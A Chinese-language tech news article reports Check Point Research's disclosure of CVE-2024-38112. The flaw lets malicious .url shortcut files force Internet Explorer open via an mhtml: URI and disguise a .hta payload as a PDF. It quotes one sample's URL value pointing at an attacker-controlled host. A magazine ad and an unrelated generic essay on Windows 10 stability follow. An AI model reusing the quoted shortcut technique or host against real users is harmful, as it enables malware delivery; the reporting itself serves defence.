誰能想到,早在 2022 年 6 月 15 日正式退役的 IE 瀏覽器,近日還能因漏洞被推上風口浪尖?
全球網絡安全解決方案提供商 Check Point Research(簡稱為 CPR)最近發現:有攻擊者在過去 18 個月里,通過構建特殊的 Windows Internet 快捷方式文件(即 .url),引誘用戶點擊并調用 IE 瀏覽器來訪問攻擊者控制的 URL,以此進行惡意攻擊。
據了解,這種漏洞甚至可以繞過 Windows 10、Windows 11 系統的安全防護。
強制調用 IE 瀏覽器打開 URL
據悉,該漏洞由 CPR 研究人員發現,追蹤編號為 CVE-2024-38112,微軟方面將其描述為 Windows MSHTML 平臺欺騙漏洞,自 2023 年 1 月以來就一直在被黑客利用:“我們發現的惡意 .url 樣本最早可以追溯到 2023 年 1 月(一年多前),最晚可以追溯到 2024 年 5 月 13 日。這表明,網絡罪犯使用這種攻擊技術已經有一段時間了。”
通過對攻擊過程的詳細分析,CPR 研究人員將該漏洞的實現分解為兩個步驟:
第一步是利用“mhtml”技巧,使得攻擊者可調用已退役的 IE 而非更安全的 Chrome/Edge。
第二步是通過某種 IE 技巧隱藏 .hta 這個擴展名,讓受害者以為他們只是打開了一個 PDF 文件——但實際上,他們正在下載并啟動一個惡意的 .hta 應用程序。
那么接下來,我們就先了解一下這個能在 Windows 中調用 IE 瀏覽器的“mhtml”技巧。
一般情況下,Internet 快捷方式文件(即 .url)是一個文本文件,里面包含各種配置信息,如顯示什么圖標、雙擊時打開什么鏈接等。將其保存為 .url 文件并雙擊后,Windows 會在默認瀏覽器中打開這個 URL。
然而,攻擊者發現可以在 URL 指令中使用 mhtml: URI 處理程序,以此強制用 IE 瀏覽器打開指定的 URL。以下面這個惡意 .url 樣本為例:
可以看到,.url 文件的最后幾行字符串指向 Microsoft Edge 應用程序文件中的一個自定義圖標。乍一看,它似乎指向一個 PDF 文件,但實際上并非如此。CPR 研究人員發現這個關鍵字的值與通常的關鍵字有很大不同:普通 .url 文件的參數類似于 URL=https://www.google.com;但這個惡意樣本的值是 URL=mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.html。
它使用了一個特殊的前綴“mhtml:”。簡單說明一下 MHTML,這是一種“聚合 HTML 文檔的 MIME 封裝”文件,是 IE 瀏覽器中引入的一種存儲文件技術,可將包括圖像在內的整個網頁封裝成一個單一檔案。
CPR 研究人員指出,這樣的惡意 .url 文件在 Windows 11 中會顯示為一個指向 PDF 文件的鏈接:
如果受害者想打開 PDF,雙擊這個 .url 文件,然后便會彈出下面這個來自 IE 瀏覽器的窗口:
沒錯,攻擊者使用 mhtml: URI 啟動 URL 后,Windows 會自動在 IE 瀏覽器中啟動 URL,而不是默認瀏覽器。如文章開頭所說,IE 瀏覽器早在 2022 年就退出歷史舞臺了,在典型的 Windows 10/11 操作系統上,因其安全性不足,用戶一般無法直接用 IE 去訪問網站。
不過有一點需要明確:盡管 IE 已被微軟宣布“退役”,但從技術上講,IE 仍是 Windows 系統的一部分,IE 使用的專有瀏覽器引擎 MSHTML (Trident)也仍包含在操作系統中,微軟計劃至少支持該引擎到 2029 年。
因此,攻擊者使用“mhtml”技巧,讓本意想打開 PDF 的用戶,實際上正在用不安全且過時的 IE 訪問攻擊者控制的網站,尤其在 IE 下載惡意文件時安全警告也相對較少。
打開一個偽裝成 PDF 的惡意 .hta 文件
既然打開的不是 PDF,那受害者通過 IE 打開的到底是什么呢?
根據 IE 瀏覽器的彈出窗口顯示,它要求用戶打開一個名為 .Books_A0UJKO.pdf 的 PDF 文件:
可一旦點擊了這個“Open”(默認選項),緊接著又會跳出另一個窗口:IE 保護模式下的警告提示。
到了這一步,如果用戶一直以為自己打開的不過是個 PDF,大概率會忽略這個警告,那么打開的就會是一個偽裝成 PDF 的惡意 .hta 文件。這是一個從 HTML 文檔中調用的可執行程序,通過一個名為 Microsoft HTML Application Host(mshta.exe)的工具在 Windows 上運行。
CPR 研究人員解釋道:“如果我們仔細觀察 HTTP 流量,就會發現在字符串末尾有許多不可打印的字符——最后是 .hta 字符串,這才是真正的(危險的)擴展名。”
但這個 .hta 字符串被隱藏了:用戶看不到真實的擴展名,所以無防備地繼續點擊文件,根本不知道自己其實正在下載并啟動一個危險的 .hta 應用程序。
一定要警惕從不可信來源發送的 .url 文件
據 CPR 研究人員證實,這個漏洞所用的技巧在 Windows 10/11 操作系統上均可實現。
于是,CPR 方面在 2024 年 5 月 16 日向微軟安全響應中心(MSRC)報告了該漏洞。此后,雙方一直就此事密切合作,終于在 7 月 9 日發布了微軟官方補丁(CVE-2024-38112)。
從通用漏洞評分系統(CVSS)來看,CVE-2024-38112 的評分為 7.5(滿分 10 分),屬于重要漏洞,攻擊者需采取額外行動才能確保成功利用該漏洞。而不論是微軟還是 CPR,都強烈建議 Windows 用戶盡快更新該補丁,因為根據調查顯示該漏洞已被黑客利用一年多了。
最后,CPR 也給出了重要提醒:“對于相關的 Windows 用戶,我們建議一定要警惕從不可信來源發送的 .url 文件,畢竟這種類型的攻擊需要一些用戶交互(如忽略警告彈窗)才能成功。”
參考鏈接:
https://research.checkpoint.com/2024/resurrecting-internet-explorer-threat-actors-using-zero-day-tricks-in-internet-shortcut-file-to-lure-victims-cve-2024-38112/
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38112
大模型刷新一切,讓我們有著諸多的迷茫,AI 這股熱潮究竟會推著我們走向何方?面對時不時一夜變天,焦慮感油然而生,開發者怎么能夠更快、更系統地擁抱大模型?《新程序員 007》以「大模型時代,開發者的成長指南」為核心,希望撥開層層迷霧,讓開發者定下心地看到及擁抱未來。
讀過本書的開發者這樣感慨道:“讓我驚喜的是,中國還有這種高質量、貼近開發者的雜志,我感到非常激動。最吸引我的是里面有很多人對 AI 的看法和經驗和一些采訪的內容,這些內容既真實又有價值。”
Windows 10作為微軟推出的一款重要操作系統,自發布以來便受到了全球用戶的廣泛關注。在眾多版本中,Windows 10以其穩定性、高效性和豐富的功能特性,逐漸成為了許多用戶的首選。本文將深入探討Windows 10的穩定性,從內核架構、安全防護、系統更新以及用戶體驗等多個維度進行分析。
一、內核架構的優化
Windows 10采用了全新的內核架構,這一變化顯著提升了系統的穩定性和高效性。全新的內核設計不僅增強了系統的底層處理能力,還優化了資源管理,使得系統在面對多任務處理時更加游刃有余。這種設計上的改進,從根本上減少了系統崩潰和死機的風險,為用戶提供了更加穩定的使用環境。
二、安全防護的多層次構建
在安全性方面,Windows 10構建了多層次的防護體系。首先,內置了Windows Defender防病毒軟件,該軟件能夠實時監測系統的安全狀況,有效抵御惡意軟件和病毒攻擊。其次,通過BitLocker加密技術,用戶可以對硬盤進行加密處理,確保數據在存儲和傳輸過程中的安全性。此外,Windows 10還提供了生物識別登錄功能,如指紋識別和面部識別等,這些功能進一步提高了賬戶的安全性,減少了密碼泄露的風險。
三、系統更新的持續優化
系統更新是維護系統穩定性的重要手段之一。Windows 10在發布后,微軟不斷推出更新補丁,以修復已知的問題和漏洞。這些更新不僅增強了系統的安全性,還提升了系統的整體性能。然而,值得注意的是,部分用戶反映在系統更新過程中可能會出現卡頓、死機等問題。這主要是由于更新過程中涉及的復雜性和多樣性所導致的。為了減少這類問題的發生,建議用戶在系統更新前備份重要數據,并確保設備電量充足,避免在更新過程中斷電或中斷操作。
四、用戶體驗的不斷提升
在用戶體驗方面,Windows 10同樣表現出色。首先,它提供了簡潔明了的設置向導,幫助用戶輕松完成系統的初步配置。其次,在多任務處理方面,Windows 10引入了虛擬桌面功能,使得用戶可以在不同的桌面間輕松切換,極大提高了工作效率。此外,Windows 10還具備強大的語音助手Cortana,能夠為用戶提供個性化的建議和提醒,進一步提升了用戶的使用體驗。
五、總結與展望
綜上所述,Windows 10在穩定性方面表現出色,這得益于其全新的內核架構、多層次的安全防護、持續優化的系統更新以及不斷提升的用戶體驗。然而,我們也應看到其存在的不足之處,并在使用中加以注意。對于廣大用戶而言,選擇適合自己的操作系統版本和配置至關重要。在未來的發展中,我們期待Windows 10能夠繼續優化升級,為用戶帶來更加出色的體驗。同時,我們也希望微軟能夠更加注重用戶體驗的反饋和需求,不斷推出更加符合用戶期望的產品和服務。